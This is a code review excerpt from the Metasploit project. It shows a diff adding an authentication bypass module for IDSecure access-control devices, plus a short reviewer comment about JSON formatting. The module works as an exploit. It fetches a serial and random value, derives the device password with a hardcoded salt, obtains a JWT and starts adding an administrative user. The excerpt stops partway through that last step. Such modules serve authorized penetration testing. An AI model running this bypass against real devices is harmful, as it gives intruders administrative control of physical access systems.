modules/auxiliary/admin/http/idsecure_auth_bypass.rb

```diff
@@ -0,0 +1,156 @@
+      OptString.new('NEW_PASSWORD', [true, 'Password for the specified user', Rex::Text.rand_text_alphanumeric(12)])
+    ])
+  end
+
+  def check
+    begin
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'api/util/configUI')
+      })
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
+      return CheckCode::Unknown
+    end
+
+    return CheckCode::Unknown unless res&.code == 401
+
+    data = res.get_json_document
+    version = data['Version']
+    return CheckCode::Unknown if version.nil?
+
+    print_status('Got version: ' + version)
+    return CheckCode::Safe unless Rex::Version.new(version) <= Rex::Version.new('4.7.43.0')
+
+    return CheckCode::Appears
+  end
+
+  def run
+    # 1) Obtain the serial and passwordRandom
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'api/login/unlockGetData')
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+    if res.code == 200
+      json = res.get_json_document
+      if json.key?('passwordRandom') && json.key?('serial')
+        password_random = json['passwordRandom']
+        serial = json['serial']
+        print_good('Retrieved passwordRandom: ' + password_random)
+        print_good('Retrieved serial: ' + serial)
+      else
+        fail_with(Failure::UnexpectedReply, 'Unable to retrieve passwordRandom and serial')
+      end
+    else
+      fail_with(Failure::UnexpectedReply, res.to_s)
+    end
+
+    # 2) Create passwordCustom
+    sha1_hash = Digest::SHA1.hexdigest(serial)
+    combined_string = sha1_hash + password_random + 'cid2016'
+    sha256_hash = Digest::SHA256.hexdigest(combined_string)
+    short_hash = sha256_hash[0, 6]
+    password_custom = short_hash.to_i(16).to_s
+    print_status("Created passwordCustom: #{password_custom}")
+
+    # 3) Login with passwordCustom and passwordRandom to obtain a JWT
+    body = "{\"passwordCustom\": \"#{password_custom}\", \"passwordRandom\": \"#{password_random}\"}"
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'ctype' => 'application/json',
+      'uri' => normalize_uri(target_uri.path, 'api/login/'),
+      'data' => body
+    })
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+    if res.code == 200
+      json = res.get_json_document
+      if json.key?('accessToken')
+        access_token = json['accessToken']
+        print_good('Retrieved JWT: ' + access_token)
+      else
+        fail_with(Failure::UnexpectedReply, 'Did not receive JWT')
+      end
+    else
+      fail_with(Failure::UnexpectedReply, res.to_s)
+    end
+
+    # 4) Add a new administrative user
+    body = '{"idType": "1", ' \
```

Comment:
Can this be replaced with a ruby hash and `to_json`

Reply:
Updated, thank you.